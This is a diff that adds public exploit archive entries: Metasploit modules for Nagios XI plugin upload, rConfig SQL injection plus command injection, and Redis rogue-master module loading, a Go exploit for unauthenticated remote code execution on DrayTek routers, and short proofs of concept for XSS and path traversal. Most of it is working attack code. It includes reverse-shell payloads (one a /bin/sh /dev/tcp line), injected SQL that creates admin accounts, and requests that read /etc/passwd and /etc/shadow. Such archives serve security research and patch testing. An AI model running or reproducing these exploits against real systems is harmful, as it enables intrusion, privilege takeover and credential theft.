+    auth_res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/login.php'),
+      'method'       => 'POST',
+      'cookie'       => cookie,
+      'vars_post'    => {
+        nsp: @nsp,
+        page:  'auth',
+        debug: '',
+        pageopt: 'login',
+        username: @username,
+        password: password,
+        loginButton: ''
+      }
+    })
+
+    unless auth_res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless auth_res.code == 302 && auth_res.headers['Location'] == "index.php"
+      fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+    end
+
+    #Check Nagios XI version - this requires a separate request because following the redirect doesn't work
+    @cookie = auth_res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+    @cookie = @cookie.split().last #app returns 3 cookies, we need only the last one
+    version_check = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/index.php'),
+      'method'       => 'GET',
+      'cookie'       => @cookie,
+      'nsp'          => @nsp
+    })
+
+    unless version_check
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless version_check.code == 200 && version_check.body.include?('Home Dashboard')
+      fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
+    end
+
+    @version = version_check.body.scan(/product=nagiosxi&version=(\d+\.\d+\.\d+)/).flatten.first rescue ''
+    if @version.to_s.eql? ''
+      return CheckCode::Detected('Could not determine Nagios XI version.')
+    end
+
+    @version = Gem::Version.new @version
+
+    unless @version <= Gem::Version.new('5.6.5')
+      return CheckCode::Safe("Target is Nagios XI with version #{@version}.")
+    end
+
+    CheckCode::Appears("Target is Nagios XI with version #{@version}.")
+  end
+
+  def check_plugin_permissions
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+      'method'       => 'GET',
+      'cookie'       => @cookie,
+      'nsp'          => @nsp
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200 && res.body.include?('Manage Plugins')
+      fail_with(Failure::NoAccess, "The user #{@username} does not have permission to edit plugins, which is required for the exploit to work.")
+    end
+
+    @plugin_nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+    if @plugin_nsp.to_s.eql? ''
+      fail_with Failure::NoAccess, 'Failed to obtain the nsp value required for the exploit to work.'
+    end
+
+    @plugin_cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+  end
+
+  def execute_command(cmd, opts = {})
+    print_status("Uploading malicious 'check_ping' plugin...")
+    boundary = rand_text_numeric(14)
+    post_data = "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"upload\"\n\n1\n"
+    post_data << "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"nsp\"\n\n"
+    post_data << "#{@plugin_nsp}\n"
+    post_data << "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n"
+    post_data << "-----------------------------#{boundary}\n"
+    post_data << "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\n" #the exploit doesn't work with a random filename
+    post_data << "Content-Type: text/plain\n\n"
+    post_data << "#{cmd}\n"
+    post_data << "-----------------------------#{boundary}--\n"
+
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+      'method'       => 'POST',
+      'ctype'        => "multipart/form-data; boundary=---------------------------#{boundary}", #this needs to be specified here, otherwise the default value is sent in the header
+      'cookie'       => @plugin_cookie,
+      'data'         => post_data
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Upload failed'
+    end
+
+    unless res.code == 200 && res.body.include?('New plugin was installed successfully')
+      fail_with Failure::Unknown, 'Failed to upload plugin.'
+    end
+
+    @plugin_installed = true
+  end
+
+  def execute_payload #This request will timeout. It has to, for the exploit to work.
+    print_status("Executing plugin...")
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/includes/components/profile/profile.php'),
+      'method'       => 'GET',
+      'cookie'       => @cookie,
+      'vars_get' => { cmd: 'download' }
+    })
+  end
+
+  def cleanup()
+    return unless @plugin_installed
+
+    print_status("Deleting malicious 'check_ping' plugin...")
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
+      'method'       => 'GET',
+      'cookie'       => @plugin_cookie,
+      'vars_get' => {
+        delete: 'check_ping',
+        nsp: @plugin_nsp
+      }
+    })
+
+    unless res
+      print_warning("Failed to delete the malicious 'check_ping' plugin: Connection failed. Manual cleanup is required.")
+      return
+    end
+
+    unless res.code == 200 && res.body.include?('Plugin deleted')
+      print_warning("Failed to delete the malicious 'check_ping' plugin. Manual cleanup is required.")
+      return
+    end
+
+    print_good("Plugin deleted.")
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if @version
+      print_status("Found Nagios XI application with version #{@version}.")
+    end
+
+    check_plugin_permissions
+    vprint_status("User #{@username} has the required permissions on the target.")
+
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded)
+      message = "Waiting for the payload to connect back..."
+    else
+      execute_cmdstager(background: true)
+      message = "Waiting for the plugin to request the final payload..."
+    end
+    print_good("Successfully uploaded plugin.")
+    execute_payload
+    print_status "#{message}"
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/48223.rb b/exploits/linux/remote/48223.rb
new file mode 100755
index 000000000..ad6f6f499
--- /dev/null
+++ b/exploits/linux/remote/48223.rb
@@ -0,0 +1,201 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'Rconfig 3.x Chained Remote Code Execution',
+                      'Description' => '
+        This module exploits multiple vulnerabilities in rConfig version 3.9
+        in order to execute arbitrary commands.
+        This module takes advantage of a command injection vulnerability in the
+        `path` parameter of the ajax archive file functionality within the rConfig web
+        interface in order to execute the payload.
+        Valid credentials for a user with administrative privileges are required.
+        However, this module can bypass authentication via SQLI.
+        This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
+        The steps are:
+          1. SQLi on /commands.inc.php allows us to add an administrative user.
+          2. An authenticated session is established with the newly added user
+          3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
+             execute the payload.
+          4. Remove the added admin user.
+        Tips : once you get a shell, look at the CVE-2019-19585.
+        You will probably get root because rConfig install script add Apache user to
+        sudoers with nopasswd ;-)
+      ',
+                      'License'         => MSF_LICENSE,
+                      'Author'          =>
+        [
+          'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module
+          'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)
+        ],
+                      'References'      =>
+        [
+          ['CVE', '2019-19509'], # authenticated rce
+          ['CVE', '2020-10220'], # sqli auth bypass
+          %w[EDB 47982],
+          %w[EDB 48208],
+          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE
+          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py']  # unauthenticated SQLi
+        ],
+                      'Platform'        => %w[unix linux],
+                      'Arch'            => ARCH_CMD,
+                      'Targets'         => [['Auto', {}]],
+                      'Privileged'      => false,
+                      'DisclosureDate'  => '2020-03-11',
+                      'DefaultOptions'  => {
+                        'RPORT' => 443,
+                        'SSL'     => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects
+                        'PAYLOAD' => 'generic/shell_reverse_tcp'
+                      },
+                      'DefaultTarget' => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])
+    ]
+  end
+
+  # CHECK IF RCONFIG IS REACHABLE AND INSTALLED
+  def check
+    vprint_status 'STEP 0: Get rConfig version...'
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => '/login.php'
+    )
+    if !res || !res.get_html_document
+      fail_with(Failure::Unknown, 'Could not check rConfig version')
+    end
+    if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
+      print_good('rConfig version 3.9 detected')
+      return Exploit::CheckCode::Appears
+    elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig'
+      print_status('rConfig detected, but not version 3.9')
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+  # CREATE AN ADMIN USER IN RCONFIG
+  def create_rconfig_user(user, _password)
+    vprint_status 'STEP 1 : Adding a temporary admin user...'
+    fake_id = Rex::Text.rand_text_numeric(3)
+    fake_pass = Rex::Text.rand_text_alpha(10)
+    fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'
+    fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'
+    userleveladmin = 9 # Administrator
+    user_sqli = "command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--"
+    sqli_res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'search' => 'search',
+        'searchOption' => 'contains',
+        'searchField'  => 'vuln',
+        'searchColumn' => user_sqli
+      }
+    )
+    unless sqli_res
+      print_warning('Failed to create user: Connection failed.')
+      return
+    end
+    print_good "New temporary user #{user} created"
+  end
+
+  # AUTHENTICATE ON RCONFIG
+  def login(user, pass)
+    vprint_status "STEP 2: Authenticating as #{user} ..."
+    # get session cookie (PHPSESSID)
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => '/login.php'
+    )
+    @cookie = res.get_cookies
+    if @cookie.empty?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'
+      return
+    end
+    # authenticate
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        pass: pass,
+        user: user,
+        sublogin: 1
+      }
+    )
+    unless res
+      print_warning('Failed to authenticate: Connection failed.')
+      return
+    end
+    print_good "Authenticated as user #{user}"
+  end
+
+  def trigger_rce(cmd, _opts = {})
+    vprint_status "STEP 3: Executing the command (#{cmd})"
+    trigger = "`#{cmd} #`"
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'path' => trigger,
+        'ext' => 'random'
+      }
+    )
+    # the page hangs because of the command being executed, so we can't expect HTTP response
+    # unless res
+    #  fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'
+    #  return
+    # end
+    # unless res.body.include? '"success":true'
+    #  fail_with Failure::Unknown, 'It seems that the code was not executed'
+    #  return
+    # end
+    print_good 'Command sucessfully executed'
+  end
+
+  # DELETE A USER
+  def delete_rconfig_user(user)
+    vprint_status 'STEP 4 : Removing the temporary admin user...'
+    del_sqli = "command ; DELETE FROM `users` WHERE `username`='#{user}';--"
+    del_res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'search' => 'search',
+        'searchOption' => 'contains',
+        'searchField'  => 'vuln',
+        'searchColumn' => del_sqli
+      }
+    )
+    unless del_res
+      print_warning "Removing user #{user} failed: Connection failed. Please remove it manually."
+      return
+    end
+    print_status "User #{user} removed successfully !"
+  end
+
+  def cleanup
+    super
+    delete_rconfig_user @username if @username
+  end
+
+  def exploit
+    check
+    @username = rand_text_alphanumeric(8..12)
+    @password = 'admin'
+    create_res = create_rconfig_user @username, @password
+    login(@username, @password)
+    tmp_txt_file = Rex::Text.rand_text_alpha(10)
+    tmp_zip_file = Rex::Text.rand_text_alpha(10)
+    # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(
+    # trigger_rce("touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'")
+    trigger_rce(payload.encoded.to_s)
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/48268.go b/exploits/linux/remote/48268.go
new file mode 100755
index 000000000..88ed03305
--- /dev/null
+++ b/exploits/linux/remote/48268.go
@@ -0,0 +1,87 @@
+package main
+
+
+/*
+CVE-2020-8515: DrayTek pre-auth remote root RCE
+Mon Mar 30 2020 -  0xsha.io
+Affected:
+DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
+and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
+and 1.4.4_Beta
+You should upgrade as soon as possible to 1.5.1 firmware or later
+This issue has been fixed in Vigor3900/2960/300B v1.5.1.
+read more :
+https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
+https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
+https://thehackernews.com/2020/03/draytek-network-hacking.html
+https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
+exploiting using keyPath
+POST /cgi-bin/mainfunction.cgi HTTP/1.1
+Host: 1.2.3.4
+Content-Length: 89
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
+ */
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"os"
+	"strings"
+)
+
+func usage()  {
+
+	fmt.Println("CVE-2020-8515 exploit by  @0xsha ")
+	fmt.Println("Usage :  " + os.Args[0] + " URL " + "command"  )
+	fmt.Println("E.G :  " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\""  )
+}
+
+func main() {
+
+
+	if len(os.Args) < 3 {
+		usage()
+		os.Exit(-1)
+	}
+
+	targetUrl := os.Args[1]
+	//cmd := "cat /etc/passwd"
+	cmd := os.Args[2]
+
+
+	// payload preparation
+	vulnerableFile := "/cgi-bin/mainfunction.cgi"
+	// specially crafted CMD
+	// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
+	payload :=`'
+	/bin/sh -c 'CMD'
+	'`
+	payload = strings.ReplaceAll(payload,"CMD", cmd)
+	bypass := strings.ReplaceAll(payload," ", "${IFS}")
+
+	//PostForm call url encoder internally
+	resp, err := http.PostForm(targetUrl+vulnerableFile ,
+		url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"}   })
+
+	if err != nil{
+		fmt.Println("error connecting host")
+		os.Exit(-1)
+	}
+
+
+	defer resp.Body.Close()
+	body, err := ioutil.ReadAll(resp.Body)
+	
+	if err != nil{
+		fmt.Println("error reading data")
+		os.Exit(-1)
+	}
+	
+	fmt.Println(string(body))
+
+}
\ No newline at end of file
diff --git a/exploits/linux/remote/48272.rb b/exploits/linux/remote/48272.rb
new file mode 100755
index 000000000..98b5c7a5d
--- /dev/null
+++ b/exploits/linux/remote/48272.rb
@@ -0,0 +1,297 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Redis
+  include Msf::Module::Deprecated
+
+  moved_from "exploit/linux/redis/redis_unauth_exec"
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Redis Replication Code Execution',
+      'Description'    => %q{
+        This module can be used to leverage the extension functionality added since Redis 4.0.0
+        to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
+        which called replication between master and slave.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Green-m  <greenm.xxoo[at]gmail.com>'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'],
+          [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK']
+        ],
+
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          ['Automatic',  {} ],
+        ],
+      'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'SRVPORT' => '6379'
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Nov 13 2018',
+      'DefaultTarget'  => 0,
+      'Notes'          =>
+        {
+          'Stability'   => [ SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
+        },
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(6379),
+        OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']),
+        OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']),
+        OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.'])
+      ]
+    )
+    deregister_options('URIPATH', 'THREADS', 'SSLCert')
+  end
+
+  #
+  # Now tested on redis 4.x and 5.x
+  #
+  def check
+    connect
+    # they are only vulnerable if we can run the CONFIG command, so try that
+    return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
+
+    if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
+      report_redis(redis_version)
+    end
+
+    unless redis_version
+      print_error('Cannot retrieve redis version, please check it manually')
+      return Exploit::CheckCode::Unknown
+    end
+
+    # Only vulnerable to version 4.x or 5.x
+    version = Gem::Version.new(redis_version)
+    if version >= Gem::Version.new('4.0.0')
+      vprint_status("Redis version is #{redis_version}")
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  ensure
+    disconnect
+  end
+
+  def has_check?
+    true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis
+  end
+
+  def exploit
+    if check_custom
+      @module_init_name = datastore['RedisModuleInit']    || Rex::Text.rand_text_alpha_lower(4..8)
+      @module_cmd       = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
+    else
+      @module_init_name = 'shell'
+      @module_cmd       = 'shell.exec'
+    end
+
+    if srvhost == '0.0.0.0'
+      fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.')
+    end
+
+    #
+    # Prepare for payload.
+    #
+    #  1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable.
+    #     It's only worked on linux system.
+    #
+    #  2. Use compiled payload, it's avaiable on all OS, however more detectable.
+    #
+    if check_custom
+      buf = create_payload
+      generate_code_file(buf)
+      compile_payload
+    end
+
+    connect
+
+    #
+    # Send the payload.
+    #
+    redis_command('SLAVEOF', srvhost, srvport.to_s)
+    redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}")
+    ::IO.select(nil, nil, nil, 2.0)
+
+    # start the rogue server
+    start_rogue_server
+    # waiting for victim to receive the payload.
+    Rex.sleep(1)
+    redis_command('MODULE', 'LOAD', "./#{module_file}")
+    redis_command('SLAVEOF', 'NO', 'ONE')
+
+    # Trigger it.
+    print_status('Sending command to trigger payload.')
+    pull_the_trigger
+
+    # Clean up
+    Rex.sleep(2)
+    register_file_for_cleanup("./#{module_file}")
+    #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
+    #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
+
+  ensure
+    disconnect
+  end
+
+  #
+  # We pretend to be a real redis server, and then slave the victim.
+  #
+  def start_rogue_server
+    begin
+      socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
+      print_status("Listening on #{srvhost}:#{srvport}")
+    rescue Rex::BindFailed
+      print_warning("Handler failed to bind to #{srvhost}:#{srvport}")
+      print_status("Listening on 0.0.0.0:#{srvport}")
+      socket = Rex::Socket::TcpServer.create({'LocalHost'=>'0.0.0.0', 'LocalPort'=>srvport})
+    end
+
+    rsock = socket.accept()
+    vprint_status('Accepted a connection')
+
+    # Start negotiation
+    while true
+      request = rsock.read(1024)
+      vprint_status("in<<< #{request.inspect}")
+      response = ""
+      finish = false
+
+      case
+      when request.include?('PING')
+        response = "+PONG\r\n"
+      when request.include?('REPLCONF')
+        response = "+OK\r\n"
+      when request.include?('PSYNC') || request.include?('SYNC')
+        response  = "+FULLRESYNC #{'Z'*40} 1\r\n"
+        response << "$#{payload_bin.length}\r\n"
+        response << "#{payload_bin}\r\n"
+        finish = true
+      end
+
+      if response.length < 200
+        vprint_status("out>>> #{response.inspect}")
+      else
+        vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}")
+      end
+
+      rsock.put(response)
+
+      if finish
+        print_status('Rogue server close...')
+        rsock.close()
+        socket.close()
+        break
+      end
+    end
+  end
+
+  def pull_the_trigger
+    if check_custom
+      redis_command("#{@module_cmd}")
+    else
+      execute_cmdstager
+    end
+  end
+
+  #
+  # Parpare command stager for the pre-compiled payload.
+  # And the command of module is hard-coded.
+  #
+  def execute_command(cmd, opts = {})
+    redis_command('shell.exec',"#{cmd.to_s}") rescue nil
+  end
+
+  #
+  # Generate source code file of payload to be compiled dynamicly.
+  #
+  def generate_code_file(buf)
+    template       = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb'))
+    File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))}
+  end
+
+  def compile_payload
+    make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile')
+    vprint_status("Clean old files")
+    vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|)
+    vprint_status(%x|make -C #{File.dirname(make_file)} clean|)
+
+    print_status('Compile redis module extension file')
+    res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true|
+    if res.include? 'true'
+      print_good("Payload generated successfully! ")
+    else
+      print_error(res)
+      fail_with(Failure::BadConfig, 'Check config of gcc compiler.')
+    end
+  end
+
+  #
+  # check the environment for compile payload to so file.
+  #
+  def check_env
+    # check if linux
+    return false unless %x|uname -s 2>/dev/null|.include? "Linux"
+    # check if gcc installed
+    return false unless %x|command -v gcc && echo true|.include? "true"
+    # check if ld installed
+    return false unless %x|command -v ld && echo true|.include? "true"
+
+    true
+  end
+
+  def check_custom
+    return @custom_payload if @custom_payload
+
+    @custom_payload = false
+    @custom_payload = true if check_env && datastore['CUSTOM']
+
+    @custom_payload
+  end
+
+  def module_file
+    return @module_file if @module_file
+    @module_file = datastore['RedisModuleName']  || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so"
+  end
+
+  def create_payload
+    p = payload.encoded
+    Msf::Simple::Buffer.transform(p, 'c', 'buf')
+  end
+
+  def payload_bin
+    return @payload_bin if @payload_bin
+    if check_custom
+      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so'))
+    else
+      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp',  'exp.so'))
+    end
+    @payload_bin
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/46669.txt b/exploits/linux/webapps/46669.txt
new file mode 100644
index 000000000..301453e93
--- /dev/null
+++ b/exploits/linux/webapps/46669.txt
@@ -0,0 +1,19 @@
+# Exploit Title: CentOS Web Panel v0.9.8.793 (Free) and v0.9.8.753 (Pro) - Email Field Stored Cross-Site Scripting Vulnerability
+# Google Dork: N/A
+# Date: 06 - April - 2019
+# Exploit Author: DKM
+# Vendor Homepage: http://centos-webpanel.com
+# Software Link: http://centos-webpanel.com
+# Version: v0.9.8.793 (Free) and v0.9.8.753 (Pro)
+# Tested on: CentOS 7
+# CVE : CVE-2019-10893
+
+# Description:
+CentOS-WebPanel.com (aka CWP) CentOS Web Panel v0.9.8.793 (Free/Open Source Version) and v0.9.8.753 (Pro) is vulnerable to Stored/Persistent XSS for Admin Email fields on the "CWP Settings > "Edit Settings" screen. By changing the email ID to any XSS Payload and clicking on Save Changes, the XSS Payload will execute.
+
+# Steps to Reproduce:
+1. Login into the CentOS Web Panel using admin credential.
+2. From Navigation Click on "CWP Settings then Click on "Edit Settings"
+3. In "Email Address" field give simple payload as: <script>alert(1)</script> and Click Save Changes
+4. Now one can see that the XSS Payload executed.
+5. The application does not properly sanitize the user input even does not validation/check the user input is valid email id or not.
\ No newline at end of file
diff --git a/exploits/linux/webapps/46784.txt b/exploits/linux/webapps/46784.txt
new file mode 100644
index 000000000..993276d34
--- /dev/null
+++ b/exploits/linux/webapps/46784.txt
@@ -0,0 +1,18 @@
+# Exploit Title: CentOS Web Panel - Domain Field (Add DNS Zone) Cross-Site Scripting Vulnerability
+# Google Dork: N/A
+# Date: 22 - April - 2019
+# Exploit Author: DKM
+# Vendor Homepage: http://centos-webpanel.com
+# Software Link: http://centos-webpanel.com
+# Version: v0.9.8.793 (Free), v0.9.8.753 (Pro) and 0.9.8.807 (Pro)
+# Tested on: CentOS 7
+# CVE : CVE-2019-11429
+
+# Description:
+CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.793 (Free/Open Source Version), 0.9.8.753 (Pro) and 0.9.8.807 (Pro) is vulnerable to Reflected XSS for the "Domain" field on the "DNS Functions > "Add DNS Zone" screen.
+
+# Steps to Reproduce:
+1. Login into the CentOS Web Panel using admin credential.
+2. From Navigation Click on "DNS Functions" > "Add DNS Zone"
+3. In "Domain" field give simple payload as: "<script>alert(1)</script>//" , fill other details like IP and Admin Email and Click "Add DNS zone"
+4. Now one can see that the XSS Payload executed.
\ No newline at end of file
diff --git a/exploits/linux/webapps/46811.txt b/exploits/linux/webapps/46811.txt
new file mode 100644
index 000000000..a47ce543d
--- /dev/null
+++ b/exploits/linux/webapps/46811.txt
@@ -0,0 +1,36 @@
+# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass
+# Google Dork: N/A
+# Date: 4/29/2019
+# Exploit Author: MobileNetworkSecurity
+# Vendor Homepage: https://www.netnumber.com/products/#data
+# Software Link: N/A
+# Version: Titan Master 7.9.1
+# Tested on: Linux
+# CVE : N/A
+# Type: WEBAPP
+
+*************************************************************************
+A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1.
+When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files.
+The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.
+*************************************************************************
+
+Proof of Concept (PoC):
+
+http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
+
+The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign.
+
+Original payload:
+Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
+
+Replaced dollar signs:
+Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw==
+
+Base64 decoded payload:
+//SYSTEM/system/trace?download=t&el=../../../../etc/shadow
+
+In the HTTP response you will receive the content of the file.
+
+*************************************************************************
+The issue has been fixed in the newer version of the software.
\ No newline at end of file
diff --git a/exploits/linux/webapps/47059.txt b/exploits/linux/webapps/47059.txt
new file mode 100644
index 000000000..d5d532897
--- /dev/null
+++ b/exploits/linux/webapps/47059.txt
@@ -0,0 +1,37 @@
+# Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting (SNMP trap receivers)
+# Google Dork: None
+# Date: 6/29/2019
+# Exploit Author: Joey Lane
+# Vendor Homepage: https://www.cyberpowersystems.com
+# Version: 3.4.0
+# Tested on: Ubuntu 16.04
+# CVE : Pending
+
+CyberPower PowerPanel Business Edition 3.4.0 contains a stored cross site scripting vulnerability.  The fields used to configure SNMP trap receivers are not being properly sanitized.  This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Event Action / Recipient page.
+
+To demonstrate the vulnerability, create a file named 'xss.xml' with the following contents:
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<ppbe>
+<target>
+<command>action.notification.trapRecipient.setup</command>
+</target>
+<inquire>
+<trapRecipientSetup>
+<action>ADD</action>
+<trapRecipient>
+<name><script>alert(1)</script></name>
+<status>true</status>
+<type>1</type>
+<ipAddress>127.0.0.1</ipAddress>
+<community>public</community>
+</trapRecipient>
+</trapRecipientSetup>
+</inquire>
+</ppbe>
+
